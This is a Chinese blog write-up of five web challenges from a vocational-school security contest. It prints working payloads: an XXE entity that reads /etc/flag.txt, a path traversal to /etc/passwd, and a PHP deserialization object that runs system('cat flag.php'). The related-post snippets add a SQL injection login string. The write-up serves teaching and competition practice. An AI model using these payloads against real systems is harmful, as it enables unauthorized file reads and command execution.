中职网络安全比赛之Web综合渗透测试

已于 2023-04-23 11:02:32 修改
阅读量1k 收藏 14
点赞数 12
分类专栏: 中职网安比赛 文章标签: 前端 web安全 php
于 2023-02-17 10:06:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53912233/article/details/129069711
版权

简介

有什么不会的可以来问我:162099475,需要题目什么的也可以来找我,欢迎交流

1.通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
2.通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
5.通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

1.通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面
在这里插入图片描述
根据提示访问flagishere.php,又发现提示。Ctrl + U 发现并没有flag
在这里插入图片描述
在这里插入图片描述
打开burpsuite 抓包进行分析
在这里插入图片描述
发现可疑的base64字符串,解密获取flag
在这里插入图片描述
在这里插入图片描述

flag{Zf@BxsTo}

2.通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面2, 根据页面英文提示,你要买最新的安卓手机吗?
在这里插入图片描述
尝试抓包修改User-Agent(浏览器请求头)
在这里插入图片描述
由于我们不清楚最新版本是多少,发送到爆破模块进行爆破
在这里插入图片描述

接下来跟我进行操作,选择数字进行爆破 在这里插入图片描述
点击长度,可以发现异样的请求包
在这里插入图片描述
点击12返回包,发现响应值回显flag

在这里插入图片描述

flag{&k5#Be*m}

3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面
在这里插入图片描述
发现flag在/etc目录下,说明要进行读取操作,再看xml的关键字,可以判断出是XML外部实体引用注入漏洞

关于XXE的利用可以参考我的另一篇文章

https://blog.csdn.net/weixin_53912233/article/details/129077736

抓包,添加payload
在这里插入图片描述

<?xml version = "1.0"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/flag.txt">
]>
<x>&xxe;</x>

返回页面,发现flag显示出来了
在这里插入图片描述

flag{!Beb9idl}

4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面,点击GOGOGO!,会出现flag提示
在这里插入图片描述
在?filename=后修改为/etc/passwd,尝试文件读取操作,发现存在任意文件读取漏洞

?filename=/etc/passwd&submit=GOGOGO%21

在这里插入图片描述
修改为flag.zip,成功获取flag

Payload:

?filename=/flag.zip&submit=GOGOGO%21
在这里插入图片描述

flag{@GCwqrUH}

5.通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面,可以看见是关于php反序列化的题目。
在这里插入图片描述

我们直接抓住关键点,不要浪费精力。大概看一下具体关键内容,第一个框框属于变量接收,第二个框框属于属于执行php语句,第三个框框属于反序列化提交的内容,最后提交至r的接收变量
在这里插入图片描述

在本地编写php文件对payload进行序列化

<?php
class PHPObjectInjection {
	public $inject = "system('cat flag.php');";
	// $inject变量接收php执行语句
}

$a  = new  PHPObjectInjection; //创建指定类名
echo serialize($a);   // 将结果进行序列化
?>

payload:

?r=O:18:"PHPObjectInjection":1:{s:6:"inject";s:23:"system('cat flag.php');";}

查看源代码获取flag
在这里插入图片描述

flag{Ig5hs$e#}

总结

一次关于简单的web渗透页面的笔记,有什么不懂的都可以找我。

PS:别光顾着收藏啊,看我那么辛苦,顺便点赞呀

cike_y
关注
  • 12
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
2023年网络安全比赛--Web渗透测试国赛篇(超详细)
Aluxian_的博客
06-29 2512
2023网络安全解析 国赛篇2380
中职网络安全竞赛-隐藏信息探索-web2-自己建立的题目环境
06-02
内容概要:自己制作的题目环境,已测试成功。隐藏信息探索-web2 1、通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为 FLAG值提交; 访问页面是一个加法计算题目:****但是输入框里面只能输入一个数字,打开开发者模式修改maxlength为10:然后可以输入结果得到flag 2、当浏览器访问swp文件时,应该显示其内容或打开下载页面。但测试时没有反应。 第3关:本站支持robots协议。 第4关:GET传参 第5关:考察万能密码:用户名输入:admin' or '1'='1 --+ 密码随意 第6关:只允许IP为172.16.1.100的地址访问 适用人群:参加中职网络安全竞赛的学生和老师 使用环境:使用phpstudy2016配置环境。通过测试。其中第5关需要数据库。把压缩包中的newsql目录复制到phpstudy/mysql/data中即可。mysql数据库用户名和密码是root/root 方法:将web2.rar解压到网站主目录www即可。用 http://127.0.0.1/web2/1/ 访问
2024年网络安全比赛--Linux渗透测试中职组(超详细)_通过 kali 对靶机场景进行 vnc 服务扫描渗透测试,并将使用 的脚本名称作为 flag(1)
最新发布
2301_79985178的博客
06-24 254
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
2024年网络安全比赛--系统渗透测试(超详细)
Aluxian_的博客
12-07 3395
6在渗透机中对服务器主机进行渗透,在服务器主机中找到管理员家目录下的flag 文件,将文件中内容作为 Flag 值提交。5.在渗透机中对服务器主机进行渗透,在服务器主机中找到网站根目录下的flag文件,将文件中内容作为 Flag 值提交;2.在渗透机中对服务器主机进行渗透,在服务器主机中获取服务器主机名称,将主机名作为 Flag 值提交;4.在渗透机中对服务器主机进行渗透,在服务器主机中获取管理员的密码,将密码作为 Flag 值提交;仅能获取 1in20230502 的 IP 地址。
2023年广东省网络安全竞赛——Web 渗透测试解析(超级详细)
旺仔Sec&blog
03-29 1411
2023年广东省网络安全竞赛——Web 渗透测试解析(超级详细)
2021年中职网络安全“江西省赛题—B-2:Linux操作系统渗透测试
weixin_57060854的博客
05-23 5643
2021年中职"网络安全"江西省赛题—B-2:Linux操作系统渗透测试学习交流B-2:Linux操作系统渗透测试 学习交流 学习交流(要环境的可以滴滴),或者遇到不会的可以+qq:3455475542 B-2:Linux操作系统渗透测试 任务环境说明:  服务器场景:Server06  服务器场景操作系统:Linux(版本不详)(关闭连接) nmap -p- -sV ip 扫描靶机端口 使用命令msfconsole打开Metasploit渗透测试平台,使用search命令搜索模块mysql暴力破解模
Web安全综合渗透测试.mp4
01-13
网络安全Web安全渗透测试视频解析
中职网络安全技能竞赛北京市2020样题
09-29
网络安全技能竞赛】北京市2020年的中职竞赛聚焦于网络空间安全,涉及的知识点广泛,主要包括系统渗透测试、漏洞扫描与利用等核心技能。参赛者需掌握Wireshark数据包分析、不同操作系统的渗透测试,以及网络协议栈...
中职网络安全 2021年湖南省省赛 赛题解析
04-20
这些题目覆盖了信息收集、数据库服务渗透测试web服务渗透测试以及数字取证等多个方面,旨在全面考核参赛选手在网络安全领域的实际操作能力。通过解决这些问题,不仅可以帮助学生提高技术能力,还能增强他们在真实...
2022年金砖国家 网络安全赛项(样题)
12-19
部署、网络安全运维、系统渗透与对抗等 通过本项目竞赛,使中职学生能熟练运用网络信息安全技术 对网络、操作系统、应用、服务器等目标进行信息和数据安全防 护与渗透,具有分析、处理现场安全问题的能力,促进...
比赛渗透测试阶段后门
热门推荐
单核CPU的小朋友的博客
11-19 3万+
python + C 实现后门 首先是模拟VSFTPD2.3.4后门漏洞。漏洞具体情况就不在这里一一分析了== 下面直接上代码 #!/usr/bin/env python from socket import * import re import os import subprocess HOST = '' PORT = 21 BUFSIZE = 1024 ADDR = (HOST,PORT) S...
2021年中职网络安全“江西省赛题—B-8:Web渗透测试
weixin_57060854的博客
06-01 2368
学习交流(要环境的可以滴滴),或者遇到不会的可以+qq:3455475542任务环境说明:  服务器场景:Server03  服务器场景操作系统:未知(关闭连接)通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令获取到当前linux用户UID为5的用户,将该用户的用户名称作为Flag进行提交; 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,
2021年江西省“网络安全”赛题B-7:渗透测试-中职组(详细讲解)
qq_62686260的博客
06-10 277
B-7:渗透测试 任务环境说明: 服务器场景:Server2009 服务器场景操作系统:未知(关闭连接) 系统用户名:administrator密码:1234561.通过本地PC中渗透测试平台Kali对靶机场景进行系统服务及版本扫描渗透测试,以xml格式向指定文件输出信息(使用工具Nmap),将以xml格式向指定文件输出信息必须要使用的参数作为Flag值提交;2.在本地PC的渗透测试平台Kali中,使用命令初始化MSF数据库并将此命令作为Flag值提交;3.在本地PC的渗透测试平台Kali中,打开MSF,使
2023年网络安全比赛--网页渗透测试中职组(超详细)
Aluxian_的博客
01-17 7662
1.访问服务器网站目录1,根据页面信息完成条件,将页面中的flag提交;2.访问服务器网站目录2,根据页面信息完成条件,将页面中的flag提交;3.访问服务器网站目录3,根据页面信息完成条件,将页面中的flag提交;4.访问服务器网站目录4,根据页面信息完成条件,将页面中的flag提交;5.访问服务器网站目录5,根据页面信息完成条件,将页面中的flag提交;6.访问服务器网站目录6,根据页面信息完成条件,将页面中的flag提交;√服务器场景操作系统:未知(封闭靶机)√用户名:未知 密码:未知。
中职网络安全竞赛B模块Server2129-Windows操作系统渗透测试
Leekk_01的博客
04-06 627
将Accpet-Encoding的gzip,deflate之间的空格删掉否则无法生效,将Accept-Charset添加并将系统命令编码为Base64。开启了3389的远程桌面服务,可以直接通过Burp Suite更改管理员用户的密码,然后登录查看DNS信息。√服务器场景:Server2129(关闭链接) √服务器场景操作系统:Windows。√服务器用户名:未知。
2023年网络安全竞赛——Windows操作系统渗透测试Server2124
旺仔Sec&blog
05-21 4055
2023年网络安全竞赛——Windows操作系统渗透测试Server2124
2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(6)解析
PushSafe
05-27 752
2021年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (6) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3
网络安全竞赛——综合靶机渗透测试ZHCS-2全过程解析教程
旺仔Sec&blog
06-17 1744
2023年六月新题综合靶机渗透测试ZHCS-2全过程解析教程
2023中职网络安全江西 web安全渗透测试
09-22
2023年中职教育中的网络安全课程将会涉及江西的web安全渗透测试。江西是我国重要的经济和科技发展地区,网络安全问题日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,包括网络原理、服务器的架设与维护、网站开发等方面的知识,确保学生对网络技术有深入的理解。学习基础知识可以为学生之后的学习和实践奠定坚实的基础。 其次,学生将学习web安全渗透测试的基本概念和原理,并通过案例分析和实践操作来加深理解。课程将引导学生了解常见的web安全漏洞,如跨站脚本攻击(XSS)、SQL注入攻击等,以及如何进行渗透测试来发现并修复这些漏洞。 此外,课程还将重点介绍江西地区的网络安全现状和需求,引导学生了解区域特色和行业需求,培养适应地方发展的能力。学生将有机会参与实际的安全渗透测试项目,深入了解江西地区的网络安全挑战,提升解决问题的能力。 最后,学生将通过实践实验和项目实训来提高技能。他们将学习使用先进的渗透测试工具和技术,如Burp Suite、Nessus等,进行安全漏洞扫描和渗透测试。通过实践训练,学生将能够掌握常见的web安全漏洞修复和防范方法。 总之,2023年中职网络安全课程包含江西web安全渗透测试内容,旨在培养学生的基础知识和技能,让他们能够应对江西地区的网络安全挑战。通过这样的培养,我们可以为江西地区的网络安全建设和发展做出积极贡献。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cike_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值